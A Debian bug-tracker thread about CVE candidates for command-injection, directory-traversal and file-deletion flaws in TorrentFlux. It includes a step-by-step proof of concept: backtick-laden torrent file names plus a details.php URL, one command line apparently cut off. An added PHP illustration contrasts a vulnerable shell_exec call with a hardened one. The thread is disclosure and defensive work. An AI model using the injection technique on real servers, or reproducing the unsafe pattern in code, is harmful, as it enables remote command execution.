Bug#400582: CVEs assigned
On 12/6/06, Cameron Dale <[EMAIL PROTECTED]> wrote:
> ==
> Name: CVE-2006-6331
> Status: Candidate
> URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6331
> Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582
> Reference: MISC:http://bugs.debian.org/cgi-bin/bugreport.cgi/11_missed_security_fixes.dpatch?bug=400582;msg=71;att=1
>
> metaInfo.php in TorrentFlux 2.2, when $cfg["enable_file_priority"] is
> false, allows remote attackers to execute arbitrary commands via shell
> metacharacters (backticks) in the torrent parameter to details.php.
>
> This problem, as described, is not present in 2.2, only in 2.1. Also, the dpatch attached is a little misleading as it contains changes that fix the 2 previous problems (6329 and 6330) as well as this one (6331).
>
> There is, however, a similar problem to this in 2.2 that Stefan described as a "local privilege escalation". It uses the torrent parameter and a local user's ability to create a file containing backticks, to then execute arbitrary commands as the webserver user (www-data). I don't think it applies to remote users though, only local. You may want to request another CVE for this one, as it is a separate problem from 6331 and does affect version 2.2.

Actually, on further investigation, I was wrong about this one, as it is a remote command execution bug in 2.2 as well, and I recommend you report it as such. I had thought that TorrentFlux's cleaning of the downloaded torrent files would make this local only, but I now see that a torrent file that includes files that have backticks will work (sorry Stefan, I misread your previous email about this).
Here is how to properly take advantage of this in Torrentflux 2.2 (or 2.1):

  mkdir -p '`touch /tmp/'
  echo "Test file" > '`touch /tmp/hello`.torrent'
  btmakemetafile --target test.torrent http://localhost:6969 \`touch\ /

Now upload test.torrent to TorrentFlux and start it downloading (it won't download anything, but that doesn't matter as the files are created when the torrent starts).

Now go to (replace username with your TorrentFlux user name):

  http://hostname/torrentflux/details.php?torrent=../username/`touch /tmp/hello`.torrent

It should say only "btshowmetainfo 20030621 - decode BitTorrent metainfo files" and the /tmp/hello file should be created as the web server user (www-data).

Cameron

-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
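The exploit above works because a filename taken from the torrent parameter ends up inside a command string that /bin/sh re-parses, so the backticks in "`touch /tmp/hello`.torrent" run as the web server user. The following is an added illustration of that pattern and its hardened counterpart; it is not TorrentFlux's metaInfo.php, and the function names, the $base/$torrent parameters and the directory path in the example call are assumptions.

```php
<?php
// Added illustration, not TorrentFlux's own code. Function names and the
// $base / $torrent parameters are assumptions made for this example.

// Vulnerable pattern: the user-controlled name is spliced into the command
// string, so the shell interprets backticks, $(...), ; and so on. With a
// name like "../username/`touch /tmp/hello`.torrent" the command inside the
// backticks runs before btshowmetainfo ever sees the filename.
function metainfo_unsafe(string $base, string $torrent): string {
    return (string) shell_exec("btshowmetainfo " . $base . $torrent);
}

// Confine the requested torrent to $base. realpath() collapses "../" and
// symlinks, but it requires the file to exist, and in the exploit the file
// with backticks in its name does exist (TorrentFlux created it when the
// torrent started), so this check is not sufficient on its own.
function resolve_torrent_path(string $base, string $torrent): ?string {
    $realBase = realpath($base);
    $real = realpath($base . DIRECTORY_SEPARATOR . $torrent);
    if ($realBase === false || $real === false) {
        return null;
    }
    if (strpos($real, $realBase . DIRECTORY_SEPARATOR) !== 0) {
        return null; // resolves outside $base (e.g. via ../)
    }
    if (substr($real, -8) !== '.torrent' || !is_file($real)) {
        return null; // only regular .torrent files are acceptable input
    }
    return $real;
}

// Hardened form: the path is confined to $base and then passed through
// escapeshellarg(), which wraps it in single quotes and escapes embedded
// single quotes. The shell hands the whole thing to btshowmetainfo as one
// literal argument, so backticks in the filename are just characters.
function metainfo_safe(string $base, string $torrent): ?string {
    $path = resolve_torrent_path($base, $torrent);
    if ($path === null) {
        return null;
    }
    return (string) shell_exec('btshowmetainfo ' . escapeshellarg($path));
}

// Example call with the name from the exploit URL. The directory is an
// assumed value; TorrentFlux's real layout is not reproduced here.
$base = '/var/lib/torrentflux/.transfers/username';
$name = '../username/`touch /tmp/hello`.torrent';
$out = metainfo_safe($base, $name);
echo $out === null ? "rejected\n" : $out;
```

Note the division of labour: the realpath() check only stops names that leave $base, and the exploit's "../username/" may well resolve back inside the user's own directory, where the backtick-named file exists. escapeshellarg() is what prevents execution in that case, and the same quoting is needed anywhere else TorrentFlux hands a torrent-derived filename to a shell.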
Bug#400582: CVEs assigned
Hi Micah,

Thanks for doing this. Unfortunately, I think one of these reports is a duplicate, and some are inaccurate as they don't apply to version 2.2. I don't know how these work, but if you can update them you may want to make some changes. See my notes below.

On 12/6/06, Micah Anderson <[EMAIL PROTECTED]> wrote:
> ==
> Name: CVE-2006-6328
> Status: Candidate
> URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6328
> Reference: MISC:http://www.milw0rm.com/exploits/2786
> Reference: SECUNIA:22880
> Reference: URL:http://secunia.com/advisories/22880
> Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582
>
> Directory traversal vulnerability in index.php for TorrentFlux 2.2 allows
> remote attackers to create or overwrite arbitrary files via sequences in
> the alias_file parameter.

This already has an advisory, see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5609

It also doesn't apply to Torrentflux 2.2, only 2.1 (the original advisory from milw0rm was incorrect, but CVE-2006-5609 is correct in indicating only 2.1 is affected). Also, the Debian bug for this one was 395930.

> ==
> Name: CVE-2006-6329
> Status: Candidate
> URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6329
> Reference: MISC:http://www.milw0rm.com/exploits/2786
> Reference: SECUNIA:22880
> Reference: URL:http://secunia.com/advisories/22880
> Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582
>
> index.php for TorrentFlux 2.2 allows remote attackers to delete files by
> specifying the target filename in the delfile parameter.

Again, this is only present in version 2.1, not 2.2. The Debian bug number for this one is 399169.
> ==
> Name: CVE-2006-6330
> Status: Candidate
> URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6330
> Reference: MISC:http://www.milw0rm.com/exploits/2786
> Reference: SECUNIA:22880
> Reference: URL:http://secunia.com/advisories/22880
> Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582
>
> index.php for TorrentFlux 2.2 allows remote registered users to execute
> arbitrary commands via shell metacharacters in the kill parameter.

Again, not present in 2.2, only in version 2.1. The Debian bug number for this one is also 399169.

> ==
> Name: CVE-2006-6331
> Status: Candidate
> URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6331
> Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582
> Reference: MISC:http://bugs.debian.org/cgi-bin/bugreport.cgi/11_missed_security_fixes.dpatch?bug=400582;msg=71;att=1
>
> metaInfo.php in TorrentFlux 2.2, when $cfg["enable_file_priority"] is
> false, allows remote attackers to execute arbitrary commands via shell
> metacharacters (backticks) in the torrent parameter to details.php.

This problem, as described, is not present in 2.2, only in 2.1. Also, the dpatch attached is a little misleading as it contains changes that fix the 2 previous problems (6329 and 6330) as well as this one (6331).

There is, however, a similar problem to this in 2.2 that Stefan described as a "local privilege escalation". It uses the torrent parameter and a local user's ability to create a file containing backticks, to then execute arbitrary commands as the webserver user (www-data). I don't think it applies to remote users though, only local. You may want to request another CVE for this one, as it is a separate problem from 6331 and does affect version 2.2.

Cameron
Bug#400582: CVEs assigned
Hi Cameron and Stefan,

Stefan requested that I request CVE IDs for the torrentflux issues from Mitre, which I have done; please see below for these. It would be good to pass these upstream and include them in any changelogs that fix these issues that haven't been uploaded already.

micah

> New torrentflux issue has come up, reference URL
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582
>
> Proposed text:
> A potential remote command execution has been found in torrentflux, a
> php-based torrent management software. Arbitrary code execution in
> metaInfo.php allows an authenticated user to execute remote shell
> commands on the server when $cfg["enable_file_priority"] is set to 'false'.

I've created 4 candidates - 3 for the Secunia advisory published in November, and one for this particular issue. See below.

==
Name: CVE-2006-6328
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6328
Reference: MISC:http://www.milw0rm.com/exploits/2786
Reference: SECUNIA:22880
Reference: URL:http://secunia.com/advisories/22880
Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582

Directory traversal vulnerability in index.php for TorrentFlux 2.2 allows
remote attackers to create or overwrite arbitrary files via sequences in
the alias_file parameter.

==
Name: CVE-2006-6329
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6329
Reference: MISC:http://www.milw0rm.com/exploits/2786
Reference: SECUNIA:22880
Reference: URL:http://secunia.com/advisories/22880
Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582

index.php for TorrentFlux 2.2 allows remote attackers to delete files by
specifying the target filename in the delfile parameter.
==
Name: CVE-2006-6330
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6330
Reference: MISC:http://www.milw0rm.com/exploits/2786
Reference: SECUNIA:22880
Reference: URL:http://secunia.com/advisories/22880
Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582

index.php for TorrentFlux 2.2 allows remote registered users to execute
arbitrary commands via shell metacharacters in the kill parameter.

==
Name: CVE-2006-6331
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6331
Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582
Reference: MISC:http://bugs.debian.org/cgi-bin/bugreport.cgi/11_missed_security_fixes.dpatch?bug=400582;msg=71;att=1

metaInfo.php in TorrentFlux 2.2, when $cfg["enable_file_priority"] is
false, allows remote attackers to execute arbitrary commands via shell
metacharacters (backticks) in the torrent parameter to details.php.